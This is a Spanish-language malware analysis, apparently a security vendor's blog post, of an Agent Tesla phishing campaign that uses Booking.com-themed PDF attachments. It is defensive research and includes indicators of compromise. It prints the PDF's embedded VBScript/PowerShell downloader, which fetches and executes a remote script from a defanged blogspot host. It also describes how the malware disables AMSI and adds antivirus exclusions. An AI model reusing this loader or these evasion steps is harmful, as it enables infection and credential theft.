Viajeros en línea en riesgo: El malware Agent Tesla ataca la industria de viajes

Hoy veremos una de las campañas similares que se envía por correo electrónico como un archivo PDF adjunto y termina descargando un RAT dejando el sistema infectado.

El correo electrónico aquí es un ejemplo de estafa y suplantación de marca en el que el remitente busca un reembolso de una reserva realizada en Booking.com y solicita al destinatario que verifique el PDF adjunto para ver el extracto de la tarjeta. La Fig.1 muestra el correo electrónico que contiene un archivo PDF adjunto.

Cadena de ejecución

 Análisis de PDF malicioso

Podemos indagar en el PDF adjunto para encontrar atributos que generalmente utilizan los actores maliciosos. Aquí primero analizamos estáticamente el PDF usando PDFiD, que escanea el archivo en busca de ciertas palabras clave de PDF y nos permite identificar contenidos PDF maliciosos 

En la Fig. 1, podemos ver que el PDF contiene 7 parámetros obj, 7 endobj, 5 stream y 1 ObjStm.

Además, podemos utilizar pdf-parser para ver el contenido del PDF. En este caso, nos centraremos en /ObjStm que generalmente oculta scripts y URL.

ObjStm de este archivo contiene un script y una URL incrustada que se muestra en la Fig. 2:

También podemos usar PDFStreamDumper para verificar flujos de objetos:

A partir de los objetos en el PDF, podemos ver que utiliza dos métodos diferentes para descargar la carga útil de la siguiente etapa:

1. Usuario haga clic en un mensaje emergente falso: URL de la acción en PDF [/URI/Type /Action/URI (hxxps://bit[.]ly/newbookingupdates)] que se conecta a una URL maliciosa hxxps://bit[.] ly/newbookingupdates y luego, redirige a hxxps://bio0king[.] blogspot[.] com/ para descargar la carga útil de JavaScript de la siguiente etapa.
2. Paralelamente, tiene código vbscript ExecuteGlobal incorporado o en algunos archivos código JavaScript para descargar directamente la carga útil remota de PowerShell de la etapa final.

Código :”<</P

(vbscript:ExecuteGlobal\("CreateObject\(""WScript.Shell""\).Run""powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$\(irm htloctmain25[.]blogspot[.]com//////////////atom.xml\) | . \('i*&*&&*x'\).replace\('*&*&&*','e'\);Start-Sleep -Seconds 5"",0:Close"\))/F (\\..\\..\\..\\Windows\\System32\\mshta)>>”

Una vez que un usuario hace clic en el enlace del PDF, la URL descarga aún más un archivo ofuscado JavaScript: Booking.com-1728394029.js

Obfuscated JavaScript

Contiene matrices de nombres muy largas y concatenación de cadenas.

Al desofuscar JS en la Fig. 7, descubrimos que está intentando conectarse a “htloctmain25[.]blogspot.com/////////////////////////atom .xml” que luego redirige a “hxxps://bitbucket[.]org/!api/2.0/snippets/nigalulli/eqxGG9/a561b2b0d79b4cc9062ac8ef8fbc0659df660611/files/file” para descargar la carga útil de PowerShell de la siguiente etapa, invocando PowerShell y luego eliminando el script.

Durante la ejecución, el PowerShell descargado utiliza varias técnicas que conllevan una fuerte ofuscación y elimina el archivo .dll que está relacionado con la familia de malware Agent Tesla. Inicialmente busca procesos críticos del sistema [RegSvcs.exe, mshta.exe, Wscript.exe, msbuild.exe] e intenta detenerlos con fuerza. 

Ofuscación:

PowerShell también contiene múltiples variables que tienen ofuscación binaria de varios niveles y utiliza funciones ".replace()" varias veces para reemplazar caracteres especiales como '*', '^' y '-' con subcadenas binarias. Contiene una función para convertir el flujo binario formado en texto ASCII. Utiliza esta ofuscación para realizar evasiones defensivas.

Durante la ejecución, reemplaza esos caracteres especiales y luego convierte la secuencia binaria en texto ASCII para formar scripts de PowerShell adicionales y carga útil .dll. Se muestra en la figura 7.1

En la figura 7.2, después de desofuscar el script, se descubre que al modificar los registros se configura CLSID en el registro con un nombre DLL "C:\IDontExist.dll". Los cambios en el registro también afectan a AMSI y lo deshabilitan al anular los objetos COM de Microsoft Defender.

En la figura 7.3, vemos que el script agrega exclusión a extensiones, rutas y procesos en AV para ejecutar el malware sin ser detectado. Luego establece preferencias y desactiva las funciones de seguridad ejecutadas con privilegios de administrador. A continuación, el script realiza cambios en el registro, los servicios y los firewalls mediante netsh.

Después de soltar el archivo .dll final, realiza la inyección de proceso en Regsvcs.exe y MSbuild.exe. Este RegSvcs.exe se conecta a "api[.]ipify[.]org" para obtener la dirección IP pública del sistema con el objetivo de robar credenciales y otros datos personales de los navegadores web y robar datos personales.Luego envía los datos exfiltrados a una sala de chat privada de Telegram.

El script de PowerShell se conecta de nuevo con un servidor diferente "htljan62024[.] blogspot[.] com//////////atom.xml" e intenta descargar otra carga útil de PowerShell similar con otra {random}[.] blogspot[.] com para la persistencia. Después de realizar todas las operaciones, PowerShell quita {random-name}.dll archivo, lo ejecuta y se elimina a sí mismo.

Conclusión:

Vimos un aumento de la actividad del malware Agent Tesla al comienzo de la pandemia. A medida que los piratas informáticos continúan usándolo en los años posteriores, continúan desarrollando técnicas y utilizando nuevas tácticas para una entrega y ejecución exitosas. Aquí, encontramos cómo la campaña de malware describe la entrega del malware por PDF que se recibe por correo electrónico y se hace pasar por una de las principales agencias de viajes. El proceso de infección es seguido por un correo electrónico falso que tiene la factura de una reserva como un archivo adjunto PDF que contiene la descarga de JavaScript malicioso que, al ejecutarse, descarga un script de PowerShell. El script de PowerShell tiene una estrategia de ofuscación sofisticada y de varias etapas que, al desofuscarla, descubrió que utiliza una serie de técnicas y carga el malware Agent Tesla. Tras la infiltración exitosa del malware, permite a los atacantes realizar actividades maliciosas como el robo de datos y la ejecución de comandos en sistemas comprometidos. 

Declaración de protección

Los clientes de Forcepoint están protegidos contra esta amenaza en las siguientes etapas del ataque:

• Etapa 2 (señuelo)– Los archivos adjuntos maliciosos asociados con estos ataques se identifican y bloquean.
• Etapa 3 (Redireccionamiento): la redirección a la URL de BlogSpot se clasifica y bloquea según la clasificación de seguridad.
• Etapa 5 (archivo cuentagotas): los archivos cuentagotas se agregan a la base de datos maliciosa de Forcepoint y se bloquean.
• Etapa 6 (llamada a casa): salas de chat privadas de Telegram abusadas por C&C bloqueadas

IOCs

Spoofed Senders:

PDF Hashes

JavaScript Hashes

PowerShell Hashes

DLL Hashes

Malicious URLs

C2s